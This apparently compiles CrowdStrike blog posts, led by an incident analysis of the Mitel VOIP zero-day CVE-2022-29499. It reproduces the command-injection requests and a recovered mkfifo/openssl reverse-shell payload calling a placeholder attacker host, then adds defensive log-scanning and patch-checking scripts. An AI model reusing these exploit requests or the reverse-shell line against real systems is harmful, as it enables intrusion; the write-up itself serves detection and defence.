CrowdStrike is privileged to help our customers prepare, hunt, react to and recover from potential cyberattacks with the world’s best threat hunting and incident response (IR) team. From our fully managed Falcon Complete™ solution to threat hunting and IR, the experts behind these services constantly feed the results of their activities — be it a newly discovered malware family, IOAs or other adversary tactics — into the Threat Graph. CrowdStrike technology then automatically uses what our experts have learned to train our AI/ML models to detect and stop future attacks. The more hunting or frontline engagements we perform, the more tacit knowledge our platform retains. As our agents and services continue to be deployed across more enterprises and endpoints, we gain more visibility and discover and contain more threats, which turns into a flywheel that keeps CrowdStrike ahead of the most advanced adversaries.

Turning On the Flywheel to Stop Breaches

We believe that the trifecta for stopping breaches is to unify the world’s best platform with the industry’s deepest data to power AI/ML and automation, all bolstered by elite human expertise. We’re proud to have been ranked No. 1 in market share for 2021 in the IDC Worldwide Corporate Endpoint Security Market Shares, 2021 report, but we are even more excited about what this means for our customers as we continue to broaden our reach, creating a virtuous cycle that keeps adversaries on their heels.

The Call Is Coming from Inside the House: CrowdStrike Identifies Novel Exploit in VOIP Appliance

23 June 2022 at 16:26
  • CrowdStrike Services recently performed an investigation that identified a compromised Mitel VOIP appliance as the threat actor’s entry point. 
  • The threat actor performed a novel remote code execution exploit on the Mitel appliance to gain initial access to the environment.
  • CrowdStrike identified and reported the vulnerability to Mitel, and CVE-2022-29499 was created.
  • The threat actor performed anti-forensic techniques on the VOIP appliance in an attempt to hide their activity.

Background

CrowdStrike Services recently investigated a suspected ransomware intrusion attempt. The intrusion was quickly stopped through the customer’s efforts and those of the CrowdStrike Falcon Complete™ managed detection and response (MDR) team, which was supporting this customer’s environment. CrowdStrike determined that all of the identified malicious activity had originated from an internal IP address associated with a device that did not have the CrowdStrike Falcon® sensor installed on it. Further investigation revealed that this source device was a Linux-based Mitel VOIP appliance sitting on the network perimeter; the availability of supported security or endpoint detection and response (EDR) software for these devices is highly limited. 

The device was taken offline and imaged for further analysis, leading to the discovery of a novel remote code execution exploit used by the threat actor to gain initial access to the environment. Thanks to close and immediate work with the Mitel product security incident response team (PSIRT), this was identified as a zero-day exploit and patched. The vulnerability was assigned CVE-2022-29499, and the associated security advisory can be found here.

Discovery and Anti-Forensic Techniques

After tracing threat actor activity to an IP address assigned to the Mitel MiVoice Connect VOIP appliance, CrowdStrike received a disk image of the Linux system and began analysis. CrowdStrike’s analysis identified anti-forensic techniques that were performed by the threat actor on the Mitel appliance in an attempt to hide their activity. Given the close proximity in time between the earliest and most recent dates of activity, it was likely that the threat actor attempted to wipe their activity on the Mitel appliance after Falcon Complete detected their activity and prevented them from moving laterally. 

Although the threat actor deleted all files from the VOIP device’s filesystem, CrowdStrike was able to recover forensic data from the device. This included the initial undocumented exploit used to compromise the device, the tools subsequently downloaded by the threat actor to the device, and even evidence of specific anti-forensic measures taken by the threat actor. 

Beyond removing files, the threat actor attempted to overwrite free space on the device. A recovered nohup.out file (generated by running a command via nohup) contained the following:

rm: cannot remove '/cf/swapfile': Operation not permitted
dd: error writing '/tmp/2': No space left on device
10666+0 records in
10665+0 records out
11183382528 bytes (11 GB) copied, 81.3694 s, 137 MB/s

The messages in the recovered file indicated two things. First, the error for the rm[1] command failing to delete the swap file demonstrated that rm was used as part of the nohup command. The original rm command run via nohup was likely designed to delete all files, but failed on the swapfile because it was active, resulting in the error message.

Second, the threat actor used the dd[2] command to attempt to create a file (/tmp/2) that, because of its size, would overwrite all of the free space on the device (and indeed did, based on the dd error message “No space left on device”). This anti-forensic measure would have been taken to prevent recovery of data deleted via the initial rm command. However, in this instance, /tmp was on a separate partition from the one storing the HTTP access logs. While the log files were also deleted via the rm command, the free space that contained their contents was not overwritten, allowing the file contents to be recovered. These recovered HTTP access logs included evidence of the exploit used to compromise the device.

Exploit Details

The exploit involved two GET requests. The first request targeted a get_url parameter of a php file, populating the parameter with a URL to a local file on the device. This caused the second request to originate from the device itself, which led to exploitation. This first request was necessary because the actual vulnerable URL was restricted from receiving requests from external IP addresses. By first targeting the get_url parameter, the actual exploit request to the vulnerable page came from the local system.

Note that the threat actor IP addresses have been replaced with invalid IPs 1.1.256.1 and 2.2.256.2 below. The URL-encoded portion at the end of the request below decodes to $PWD|sh|?.

Request #1:

1.1.256.1 - - [01/Mar/2022:01:25:17 -TZ] "GET /scripts/vtest.php?get_url=http://127.0.0.1/ucbsync.php%3fcmd=syncfile:db_files/favicon.ico:2.2.256.2/%24%50%57%44%7c%73%68%7c%3f HTTP/1.1" 200 40

The second request included command injection that would cause the system to perform an HTTP GET request to attacker-controlled infrastructure and then pipe the results of the request locally to sh.[3] This would allow execution of whatever commands were stored on the attacker’s server at the requested URL. The vulnerability was caused by the PHP file in question splitting up the parameters for the syncfile command, one of which would subsequently be used by the appliance in a curl command. Because the request came from localhost — by first sending the request to the file with the get_url parameter — it was allowed. The request is shown below.

Request #2:

127.0.0.1 - - [01/Mar/2022:01:25:17 -TZ]  "GET /ucbsync.php?cmd=syncfile:db_files/favicon.ico:2.2.256.2/$PWD|sh|? HTTP/1.0" 200 -

In addition to recovering the logs, CrowdStrike recovered the contents of two outbound HTTP requests from the appliance to the attacker’s infrastructure. These outbound requests were both caused by the second request shown above. The responses to the outbound requests were also recovered, which demonstrated that the attacker used the exploit to create a reverse shell.
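Both requests leave a recognisable trace in the access log: a get_url parameter whose target is the loopback address, and a syncfile argument to ucbsync.php that contains shell metacharacters. The script below is an added example, not CrowdStrike's or Mitel's code; it parses Apache-style access-log lines, decodes the request target the way the web server would, and reports both patterns. The log lines are constructed to mirror the sanitised requests above, keeping the invalid addresses 1.1.256.1 and 2.2.256.2 as placeholders.

```python
"""Flag the two-stage request pattern from the access log.

Added example, not CrowdStrike's or Mitel's code. Stage 1 is a request to
vtest.php whose get_url parameter points back at the device (loopback);
stage 2 is the bounced request to ucbsync.php whose syncfile argument
carries shell metacharacters. The log lines below are constructed.
"""
import re
from typing import List, Tuple
from urllib.parse import parse_qs, urlsplit

# Apache-style access log: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\]\s+'
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)
# Characters a shell interprets if the argument ends up inside a command line.
SHELL_META = re.compile(r"[|;&`$]")
LOOPBACK_NAMES = {"localhost", "::1"}


def is_loopback(host: str) -> bool:
    return host in LOOPBACK_NAMES or host.startswith("127.")


def analyse_target(target: str, depth: int = 0) -> List[str]:
    """Return findings for one request target (path plus query string)."""
    findings: List[str] = []
    parts = urlsplit(target)
    # parse_qs percent-decodes each value once, as the PHP layer on the device would.
    query = parse_qs(parts.query, keep_blank_values=True)

    for inner in query.get("get_url", []):
        host = urlsplit(inner).hostname or ""
        if is_loopback(host):
            findings.append(f"get_url bounces to loopback: {inner}")
            if depth < 1:
                # Examine the embedded request as the device itself will receive it.
                findings.extend(analyse_target(inner, depth + 1))

    if parts.path.endswith("/ucbsync.php"):
        for cmd in query.get("cmd", []):
            if cmd.startswith("syncfile:") and SHELL_META.search(cmd):
                findings.append(f"shell metacharacters in syncfile argument: {cmd}")
    return findings


def scan_log(lines: List[str]) -> List[Tuple[str, List[str]]]:
    """Return (client ip, findings) for every line that produced a finding."""
    results: List[Tuple[str, List[str]]] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line, or a format this parser does not know
        findings = analyse_target(m.group("target"))
        if findings:
            results.append((m.group("ip"), findings))
    return results


# Constructed sample log, modelled on the sanitised requests in the write-up.
SAMPLE_LOG = [
    # Stage 1: external client asks vtest.php to fetch a URL pointing back at the device.
    '1.1.256.1 - - [01/Mar/2022:01:25:17 -0500] "GET /scripts/vtest.php?get_url='
    'http://127.0.0.1/ucbsync.php%3fcmd=syncfile:db_files/favicon.ico:2.2.256.2/'
    '%24%50%57%44%7c%73%68%7c%3f HTTP/1.1" 200 40',
    # Stage 2: the bounced request arrives from localhost with the decoded argument.
    '127.0.0.1 - - [01/Mar/2022:01:25:17 -0500]  "GET /ucbsync.php?cmd=syncfile:'
    'db_files/favicon.ico:2.2.256.2/$PWD|sh|? HTTP/1.0" 200 -',
    # Ordinary traffic that should not be flagged.
    '10.0.0.25 - - [01/Mar/2022:01:30:00 -0500] "GET /scripts/vtest.php'
    '?get_url=http://updates.example.test/ping HTTP/1.1" 200 12',
    '10.0.0.25 - - [01/Mar/2022:01:31:00 -0500] "GET /ucbsync.php?cmd=manifest HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for ip, findings in scan_log(SAMPLE_LOG):
        print(ip)
        for finding in findings:
            print("  -", finding)
```

The first sample line produces two findings because the embedded URL is decoded and examined the way the device will see it, which is why the percent-encoded `%24%50%57%44%7c%73%68%7c%3f` surfaces as `$PWD|sh|?`. Running a check like this over recovered logs also shows why the loopback source on the second request matters: on its own, a request from 127.0.0.1 looks like the appliance talking to itself.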

The first outbound request returned valid JSON that the application needed in order to reach the vulnerable section of code.

Outbound request and response #1:

GET /$PWD|sh|?/ucbsync.php?cmd=manifest HTTP/1.1
Host: 2.2.256.2
Accept: */*
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.8.10
Date: Tue, 01 Mar 2022 01:25:17 GMT
Content-type: text/html
 
{"db_files":[{"name":"exmaple0.jpg","size":55318,"date":000000000},{"name":"default_logo.jpg","size":4181,"date":0000000000},{"name":"favicon.ico","size":4364,"date":0000000000},{"name":"example1.jpg","size":73553,"date":0000000000},{"name":"example1.jpg","size":35299,"date":0000000000},{"name":"example2.jpg","size":58617,"date":0000000000},{"name":"default_banner.jpg","size":3148,"date":0000000000},{"name":"example2.jpg","size":63954,"date":0000000000},{"name":"example2.jpg","size":48666,"date":0000000000},{"name":"example3.jpg","size":65224,"date":0000000000},{"name":"example3.jpg","size":39322,"date":0000000000},{"name":"example4.jpg","size":34328,"date":0000000000},{"name":"example5.jpg","size":41095,"date":0000000000},{"name":"example6.jpg","size":43450,"date":0000000000},{"name":"example5.jpg","size":52095,"date":0000000000},{"name":"example7.jpg","size":8331,"date":0000000000}]}

The second outbound request showed the remote execution in action. The following recovered outbound GET request to /shoretel/wc2_deploy (hosted on the threat actor’s external infrastructure) included the payload in its response: an SSL-enabled reverse shell created via the mkfifo command and openssl s_client.

Outbound request and response #2:

GET //shoretel/wc2_deploy HTTP/1.1
User-Agent: curl/7.29.0
Host: 2.2.256.2
Accept: */*
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.8.10
Date: Tue, 01 Mar 2022 01:25:17 GMT
Content-type: text/html
 
mkfifo /tmp/.svc_bkp_1; /bin/sh -i < /tmp/.svc_bkp_1 2>&1 | openssl s_client -quiet -connect 2.2.256.2:443 > /tmp/.svc_bkp_1; rm /tmp/.svc_bkp_1

In other words, the threat actor had a webserver (via the Python SimpleHTTP module) running on infrastructure they controlled. On this webserver was a file named wc2_deploy that contained the mkfifo command shown above. Because the threat actor’s exploit request involved reaching out to this URL and piping the response to sh, this would cause the reverse shell command to be executed upon exploitation.

Leveraging first in, first out (FIFO) pipes is a common technique to create a reverse shell. Often, shells created in this manner will use netcat instead of openssl s_client, but the functionality is the same, except that openssl s_client will use ssl and netcat will typically be plaintext.

Post-Exploitation Activity

Once the reverse shell was established, the threat actor created what appeared to be a webshell named pdf_import.php. The contents of pdf_import.php were not recovered; however, it was not a standard file name for the device, and a recovered log file included a POST request to the file that originated from the same IP address that the exploit requests originated from.

1.1.256.1 - - [1/Mar/2022:06:36:04 -0500] "POST /vhelp/pdf/pdf_import.php HTTP/1.1" 200 2

The threat actor also downloaded the tunneling/proxy tool Chisel onto the VOIP appliance, renamed it memdump and executed it. This binary acted as a reverse proxy to allow the threat actor to pivot further into the environment via the VOIP device. The execution of Chisel, as well as the POST request to pdf_import.php, both directly corresponded with malicious activity detected and blocked by Falcon Complete on internal devices, suggesting that the threat actor used both tools to attempt to move laterally into the environment.

Conclusion

Timely patching is critical to protect perimeter devices. However, when threat actors exploit an undocumented vulnerability, timely patching becomes irrelevant. That’s why it’s crucial to have multiple layers of defense, such as Falcon Complete MDR, which performs threat monitoring and remediation of malicious activity 24/7. Critical assets should be isolated from perimeter devices to the extent possible. Ideally, if a threat actor compromises a perimeter device, it should not be possible to access critical assets via “one hop” from the compromised device. In particular, it’s critical to isolate and limit access to virtualization hosts or management servers such as ESXi and vCenter systems as much as possible. This can involve jump-boxes, network segmentation and/or multifactor authentication (MFA) requirements. 

Having an up-to-date and accurate asset inventory is also critically important, as you can’t protect something if you don’t know it exists. In addition, it’s important to ensure all service accounts are managed and accounted for, and that the capability exists to detect abnormal account usage. CrowdStrike Falcon Identity Protection can provide such insight by alerting on stale account usage as well as when accounts are associated with abnormal source or destination systems — and even forcing MFA challenges for users accessing critical assets.

Endnotes

  1. Linux command to remove files or directories
  2. Linux command to convert and copy files
  3. Linux command to spawn a shell or terminal prompt

Capture the Flag: CrowdStrike Intelligence Adversary Quest 2022

16 June 2022 at 19:04

The Adversary Quest is back! From July 11 through July 25, 2022, the CrowdStrike Intelligence Advanced Research Team invites you to go head-to-head with three unique adversaries during our second annual Adversary Quest. Last year hundreds of Adversary Quest participants battled for the coveted CrowdStrike swag that was awarded to the top 50 high scorers. Now it’s your chance to defeat the adversary and win!

Register now and you will be able to track CATAPULT SPIDER (a ransomware adversary with a weird passion for a specific altcoin), PROTECTIVE PENGUIN (sentient Antarctic wildlife with offensive cybersecurity capabilities) and TABLOID JACKAL (a previously unknown adversary in disagreement with SPACE JACKAL’s preferences for source code indentation).

How to Play

The Adversary Quest will feature one track for each adversary, and each track will consist of four challenges. The tracks may include topics such as binary exploitation, reverse engineering, cryptography and OSINT research. The game is open to individual players (no teams) and designed to be an enjoyable experience for security enthusiasts of all skill levels.

During the game, you will need to find and submit flags that conform to the following format: CS{this_is_an_example}. If your finding doesn’t follow this format, you will need to keep searching. For each finding, you will get points that sum up to a total score.

The game is meant to be enjoyable for everyone, so please don’t attack the game’s infrastructure (e.g., the scoreboard or any service that is not obviously part of a challenge) and don’t share write-ups or spoilers before the game ends. After the game, we would love to see your solutions and write-ups online.

The formal terms of the event are at https://adversary.quest/tos. Like last year, the best players will be awarded some cool swag!

Timeline

  • Register now at https://adversary.quest/register
  • The event begins on July 11, 2022 at 17:00 UTC / 1:00 p.m. EDT / 10:00 a.m. PDT
  • The event ends on July 25, 2022 at 17:00 UTC / 1:00 p.m. EDT / 10:00 a.m. PDT

Contact

Email any questions about the event to [email protected]. We look forward to your participation!

June 2022 Patch Tuesday: Three Critical CVEs and a Fix for the Follina Vulnerability

16 June 2022 at 18:29

Microsoft has released 55 security patches for its June 2022 Patch Tuesday rollout. Three of the 55 CVEs addressed are rated Critical severity, with CVE-2022-30136 having the highest CVSS score of 9.8. In this blog, the CrowdStrike Falcon Spotlight™ team offers an analysis of this month’s vulnerabilities, as well as insights into the vulnerabilities and patches affecting Microsoft products in the first half of this year. We highlight the CVEs in this month’s update that are most severe and recommend how to prioritize patching. Additionally, we discuss a much-anticipated patch for the Follina vulnerability (CVE-2022-30190). 

Official Fix for Windows MSDT Follina Zero-Day Vulnerability

Microsoft’s June 2022 patch update includes a fix for the widely exploited zero-day in the Windows Microsoft Support Diagnostic Tool (MSDT) known as Follina. The vulnerability was first seen last month in attacks in which a malicious Office document caused Word to call MSDT through the ms-msdt: URL protocol handler and execute attacker-controlled PowerShell. In the initial samples the payload ran when a user simply opened a Word document; Protected View blocked the .docx variant, but the RTF variant could fire from the Explorer preview pane without the file ever being opened. A brief timeline on this vulnerability:

  • On May 27, 2022, a remote code execution vulnerability was reported affecting MSDT
  • The vulnerability, which is classified as a zero-day, can be invoked via weaponized Microsoft Office documents, Rich Text Format (RTF) files, XML files and HTML files
  • The CrowdStrike Falcon® platform protects customers from current Follina exploitation attempts using behavior-based indicators of attack (IOAs)
Rank      CVSS Score  CVE             Description
Critical  7.8         CVE-2022-30190  Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability

CrowdStrike recommends that you determine which hosts in your environment are affected by this vulnerability and apply the June update. Where a host cannot be patched immediately, Microsoft’s interim workaround of removing the ms-msdt: protocol handler remains an option.
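The script below is an added example, not code from the original post or from CrowdStrike. It implements the interim workaround Microsoft published for CVE-2022-30190 before the June fix shipped: check whether the ms-msdt: URL protocol handler is present, back it up with reg.exe, and delete it. The backup path is an assumption; run it in an elevated PowerShell session.

```powershell
# Added example: detect, back up and (optionally) remove the ms-msdt: handler
# that Follina abuses. Mirrors Microsoft's published workaround:
#   reg export HKEY_CLASSES_ROOT\ms-msdt <file>  then  reg delete HKEY_CLASSES_ROOT\ms-msdt /f
# Restore later with: reg import <file>
# $BackupPath is an assumed location. Requires an elevated session.
param(
    [switch]$Remove,
    [string]$BackupPath = "$env:SystemDrive\ms-msdt-backup.reg"
)

$key = 'Registry::HKEY_CLASSES_ROOT\ms-msdt'

if (-not (Test-Path $key)) {
    Write-Output "ms-msdt handler not present: workaround already applied or not applicable."
    return
}

# Record what the handler launches before touching it (normally msdt.exe).
$cmd = (Get-ItemProperty -Path "$key\shell\open\command" -ErrorAction SilentlyContinue).'(default)'
Write-Output "ms-msdt handler present. Command: $cmd"

if (-not $Remove) {
    Write-Output "Re-run with -Remove to back up and delete the handler."
    return
}

# reg.exe is used for the backup so that 'reg import' can restore it verbatim.
reg.exe export HKEY_CLASSES_ROOT\ms-msdt $BackupPath /y | Out-Null
if ($LASTEXITCODE -ne 0) {
    throw "Backup to $BackupPath failed; not deleting the key."
}

Remove-Item -Path $key -Recurse -Force
Write-Output "Handler removed. Backup written to $BackupPath"
```

With the handler gone, links that launch Windows troubleshooters stop working, which is why the backup matters: once the June update is installed the workaround is no longer needed and the key can be restored with reg import.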

June 2022 Risk Analysis

The top three attack types — remote code execution (RCE), elevation of privilege and information disclosure — continue to dominate, with denial of service following at almost 6%.

Figure 1. Breakdown of June 2022 Patch Tuesday attack types

The affected product families, however, differ greatly from last month. Compared with May 2022, Developer Tools (including Visual Studio Code, Visual Studio 2019 and 2022, and the Microsoft .NET Framework) saw a significant decrease in vulnerabilities patched. Microsoft Windows received the most patches this month, with Extended Security Updates (ESU) following close behind. A single Microsoft Exchange update was also included in this month’s patching list.

Figure 2. Breakdown of June 2022 Patch Tuesday affected product families

Critical Vulnerabilities Affecting LDAP, NFS and Hyper-V

Three vulnerabilities ranked as Critical received patches this month. Affected products are Windows Lightweight Directory Access Protocol (LDAP), Windows Network File System (NFS) and Windows Hyper-V. Let’s review each of these vulnerabilities and how they could affect an organization’s environment. 

CVE-2022-30136: This Windows Network File System remote code execution vulnerability, with a CVSS of 9.8, is very similar to CVE-2022-26937, an NFS CVE patched last month. It could allow an unauthenticated remote attacker to execute privileged code on affected systems running the NFS server. On the surface, the only difference between the two is that this month’s update fixes a flaw in NFSv4.1, whereas the flaws found last month affected only NFSv2.0 and NFSv3.0. Enterprises running NFS should prioritize testing and deploying this fix: because the May update did not cover NFSv4.1, hosts patched in May remain exposed until the June update is applied.
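To tell which hosts are actually in scope for the two NFS CVEs, the check below (an added example, not code from the original post or from CrowdStrike) reports whether the Server for NFS role is installed on a Windows Server and which protocol versions it serves. It assumes the ServerManager module and the NFS PowerShell module that ships with the role.

```powershell
# Added example: report NFS exposure on this Windows Server host.
# NFSv4.1 servers are in scope for CVE-2022-30136 (June 2022);
# NFSv2/v3 servers were in scope for CVE-2022-26937 (May 2022).
# Assumes the ServerManager and NFS modules (present with the role).
$feature = Get-WindowsFeature -Name FS-NFS-Service -ErrorAction SilentlyContinue

if (-not $feature -or -not $feature.Installed) {
    Write-Output "Server for NFS is not installed on $env:COMPUTERNAME; CVE-2022-30136 does not apply."
    return
}

$cfg = Get-NfsServerConfiguration

# EnableNFSV4 governs the v4.x server, which on Windows Server is NFSv4.1.
[pscustomobject]@{
    ComputerName       = $env:COMPUTERNAME
    NFSv2Enabled       = $cfg.EnableNFSV2
    NFSv3Enabled       = $cfg.EnableNFSV3
    NFSv4Enabled       = $cfg.EnableNFSV4
    InScopeForCVE30136 = [bool]$cfg.EnableNFSV4
    InScopeForCVE26937 = [bool]($cfg.EnableNFSV2 -or $cfg.EnableNFSV3)
}
```

Run it through Invoke-Command against your file-server inventory and patch the hosts that come back in scope first; a host that serves no NFS version at all can take the update on the normal schedule.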

CVE-2022-30163: This Windows Hyper-V remote code execution vulnerability with a CVSS of 8.5 could allow a user on a Hyper-V guest to run their code on the underlying Hyper-V host OS. The update doesn’t list the privileges the attacker’s code would run at, but any guest-to-host escape should be taken seriously. Microsoft notes that attack complexity is high since an attacker would need to win a race condition.

CVE-2022-30139: This Windows Lightweight Directory Access Protocol (LDAP) remote code execution vulnerability with a CVSS of 7.5 is one of the seven LDAP vulnerabilities fixed this month. The volume of CVEs in LDAP over the last couple of months could indicate a broad attack surface in the component.

Rank      CVSS Score  CVE             Description
Critical  9.8         CVE-2022-30136  Windows Network File System Remote Code Execution Vulnerability
Critical  8.5         CVE-2022-30163  Windows Hyper-V Remote Code Execution Vulnerability
Critical  7.5         CVE-2022-30139  Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability

Additional Windows LDAP Remote Code Execution Bugs

Seven RCE vulnerabilities affecting Windows LDAP were patched this month, down from 10 last month. One is rated Critical (covered in the previous section) and six are rated Important. The two most severe, each scored 8.8, are exploitable only if the MaxReceiveBuffer LDAP policy has been raised above its default value of 10,485,760 bytes; environments that keep the default are not exposed through those two bugs, which makes the policy setting worth verifying on every domain controller.

Rank       CVSS Score  CVE             Description
Important  8.8         CVE-2022-30161  Windows LDAP Remote Code Execution Vulnerability
Important  8.8         CVE-2022-30153  Windows LDAP Remote Code Execution Vulnerability
Important  8.1         CVE-2022-30141  Windows LDAP Remote Code Execution Vulnerability
Important  7.5         CVE-2022-30143  Windows LDAP Remote Code Execution Vulnerability
Important  7.5         CVE-2022-30146  Windows LDAP Remote Code Execution Vulnerability
Important  7.5         CVE-2022-30149  Windows LDAP Remote Code Execution Vulnerability
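Because the two 8.8-scored LDAP bugs hinge on MaxReceiveBuffer, the script below (an added example, not code from the original post or from CrowdStrike) reads that policy from the directory. LDAP policies are stored as Name=Value strings in the lDAPAdminLimits attribute of the Default Query Policy object, and individual domain controllers can be bound to a different policy through the queryPolicyObject attribute on their NTDS Settings object. It assumes the ActiveDirectory module and a domain-joined session.

```powershell
# Added example: check whether MaxReceiveBuffer has been raised above its
# default (10,485,760 bytes), the precondition Microsoft gives for the
# 8.8-scored June 2022 LDAP RCEs. Assumes the ActiveDirectory module.
Import-Module ActiveDirectory

$DefaultMaxReceiveBuffer = 10485760

$configNC = (Get-ADRootDSE).configurationNamingContext
$policyDN = "CN=Default Query Policy,CN=Query-Policies,CN=Directory Service," +
            "CN=Windows NT,CN=Services,$configNC"

$policy = Get-ADObject -Identity $policyDN -Properties lDAPAdminLimits

# lDAPAdminLimits is multi-valued, one "Name=Value" string per policy.
$limits = @{}
foreach ($entry in $policy.lDAPAdminLimits) {
    $name, $value = $entry -split '=', 2
    $limits[$name] = [int64]$value
}

# A policy that is absent from the object takes the built-in default.
$effective = if ($limits.ContainsKey('MaxReceiveBuffer')) {
    $limits['MaxReceiveBuffer']
} else {
    $DefaultMaxReceiveBuffer
}

[pscustomobject]@{
    PolicyObject     = $policyDN
    MaxReceiveBuffer = $effective
    AboveDefault     = $effective -gt $DefaultMaxReceiveBuffer
}

# DCs bound to a non-default query policy must be checked against that
# policy object instead; list any such bindings so they are not missed.
Get-ADObject -SearchBase "CN=Sites,$configNC" `
    -LDAPFilter '(&(objectClass=nTDSDSA)(queryPolicyObject=*))' `
    -Properties queryPolicyObject |
    Select-Object DistinguishedName, queryPolicyObject
```

AboveDefault being true does not change the need to patch; it changes the priority, because those domain controllers are the ones on which CVE-2022-30161 and CVE-2022-30153 are reachable.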

Two Important Kerberos Vulnerabilities

Two vulnerabilities involving Windows Kerberos and the Kerberos AppContainer received CVSS scores of 8.8 and 8.4, respectively, and are rated Important rather than Critical. They nonetheless deserve attention from any organization using the affected products.

CVE-2022-30164: Kerberos AppContainer security feature bypass vulnerability. If exploited, an attacker could bypass the Kerberos service ticketing feature that performs user access control checks. According to Microsoft, no user interaction is required, and attack complexity is rated Low.

CVE-2022-30165: Windows Kerberos elevation of privilege vulnerability. Rated Important with a CVSS of 8.8, this bug affects servers on which both the Credential Security Support Provider (CredSSP) and Remote Credential Guard (RCG) are configured. An attacker could elevate privileges and then spoof the Kerberos logon process when an RCG connection is made via CredSSP. According to Microsoft, no user interaction is required and attack complexity is rated Low.

Rank       CVSS Score  CVE             Description
Important  8.8         CVE-2022-30165  Windows Kerberos Elevation of Privilege Vulnerability
Important  8.4         CVE-2022-30164  Kerberos AppContainer Security Feature Bypass Vulnerability

Falcon Spotlight provides the visibility SecOps teams need to quickly identify which vulnerabilities are present in your organization’s environment. Falcon Spotlight is fully integrated within the CrowdStrike Falcon® platform, which adds detection and response capabilities, including the ability to immediately isolate potentially compromised hosts. The Falcon platform also mitigates the risk from vulnerabilities that cannot be patched rapidly by detecting and automatically preventing exploitation attempts and post-exploitation activity.

H1 2022 Vulnerability Recap

Microsoft has published 461 CVEs affecting its products in 2022 as of June 14. While this is markedly lower than the 612 vulnerabilities reported in H1 2021, what has remained consistent is the persistence of adversaries working to exploit vulnerabilities across a wide range of products. Out-of-band (OOB) patching and active exploitation continue to occur (such as Follina and Log4j), so a review of Patch Tuesday vulnerabilities should be a key component of your vulnerability management program.

Figure 3. Number of CVEs that Microsoft released each month, January-June 2022

While April saw the greatest number of vulnerabilities patched (it was the only month to exceed 100 in H1 2022), the quantity of patches in a given month does not correlate with higher risk or indicate a higher rate of exploitation. It also does not signify an increase in eCriminal activity against a particular product or service. In the latest Verizon Data Breach Investigations Report (DBIR), vulnerability exploit analysis showed that organizations running a robust vulnerability management program were able to patch or remediate vulnerabilities and had no discernible security issues relating to them. Organizations that did not regularly review vulnerabilities as part of their lifecycle, however, ended up with more incidents, especially involving internet-facing hosts.

What does all this mean for you in 2022? We have a few insights when it comes to maintaining your vulnerability management program:

  • Adversaries are persistent and consistent; they have all the time in the world and will continue to look for access in whatever way possible. Remember, a small amount of access is still access. 
  • Vulnerabilities do not exist in a vacuum; assets, hosts and entities are all connected to each other in an environment, and many of them to the internet as well. It’s increasingly apparent that holistic visibility of all assets and how they relate to each other should be monitored in conjunction with your vulnerability management program. Security hygiene and attack surface visibility can offer valuable insights into how you prioritize and patch vulnerabilities within your environment.
  • Patch Tuesday matters! If any part of your environment uses Microsoft products, or if other vendors conduct patching cycles, it’s important to review the patches released every month and take time to apply fixes or updates to products wherever applicable. 

When It Comes to Vulnerabilities, It’s Not Just About Quantity

Adversaries will never go away. They will use any and every opportunity to take advantage of a flaw, weakness or vulnerability. Fixing the big “holes” in your organization’s environment is a great start, but to stay on top of your vulnerability lifecycle program, SecOps staff must regularly maintain the program you’ve defined and use it to determine which vulnerabilities are critical to your environment. A high CVSS score does not necessarily mean a vulnerability is critical to your team. Context and prioritization matter, especially given that many SecOps teams have limited time to apply updates and patches.

CrowdStrike recommends relying on solutions that aid in speedy mitigation and remediation when it comes to all vulnerabilities, both in and out of Patch Tuesday cycles. CrowdStrike’s suite of SecOps solutions help provide deep-level context, including insights surrounding more advanced threats. 

For vulnerability management specifically, Falcon Spotlight can help you dynamically rate and prioritize the vulnerabilities that matter to your organization, and help you build workflows that automatically schedule the CVEs that belong in routine maintenance. See how Falcon Spotlight operates via its AI-driven ExPRT.AI rating and workflows.

Learn More

This video on Falcon Spotlight™ vulnerability management shows how you can quickly monitor and prioritize vulnerabilities within the systems and applications in your organization. 

About CVSS Scores

The Common Vulnerability Scoring System (CVSS) is a free and open industry standard that CrowdStrike and many other cybersecurity organizations use to assess and communicate the severity and characteristics of software vulnerabilities. The CVSS Base Score ranges from 0.0 to 10.0, and the National Vulnerability Database (NVD) adds a qualitative severity rating for each score range. Learn more about vulnerability scoring in this article.

Seven Key Ingredients of Incident Response to Reduce the Time and Cost of Recovery

8 June 2022 at 18:54

When a breach occurs, time is of the essence. The decisions you make about whom to collaborate with and how to respond will determine how much impact the incident is going to have on your business operations.

This blog outlines the seven key ingredients needed for successful incident response, given the spate of widespread ransomware attacks we are witnessing today. This approach to incident response is captured in a CrowdStrike Services Incident Response eBook that describes in more detail the value of each ingredient and how it contributes to a substantial reduction in the time it takes to recover from a cyber incident (from weeks or months to hours or days) and in the cost of recovery, and, most importantly, to avoiding business downtime that could have a material impact on an organization’s financials.

These key ingredients are based on many years and thousands of IR engagements defending organizations across the globe against nation-state and eCrime threat actors. We have evolved and honed our incident response technologies, processes and methods to keep pace with these adversaries so we can help you respond to today’s sophisticated, widespread attacks.

With these key ingredients and the value they deliver, we can recover from a widespread attack with speed and precision, with minimal user impact and system downtime, and avoid any potential business outage or interruption for our clients. The key ingredients are:

  1. Immediate Threat Visibility
  2. Active Threat Containment
  3. Accelerated Forensic Analysis
  4. Real Time Response and Recovery
  5. Enterprise Remediation
  6. Threat Hunting and Monitoring
  7. Managed Detection and Response

If you suspect you are the victim of a breach, your traditional security technology and processes may have failed you. The faster you can deploy next-generation security technology, the faster you can stop the breach.

The last thing you want in this situation is to use a traditional recovery approach that suggests the only way to recover from a breach is the full blunt force of wiping systems and applying full system remediation (reimage, rebuild or replace). This approach may have worked for attacks that occur on a handful of systems, but against today’s widespread ransomware attacks that impact hundreds or thousands of endpoints, we need a more intelligence-driven and effective solution — one that provides immediate visibility to the full threat context and enables the real-time surgical removal of attack artifacts with speed and precision.

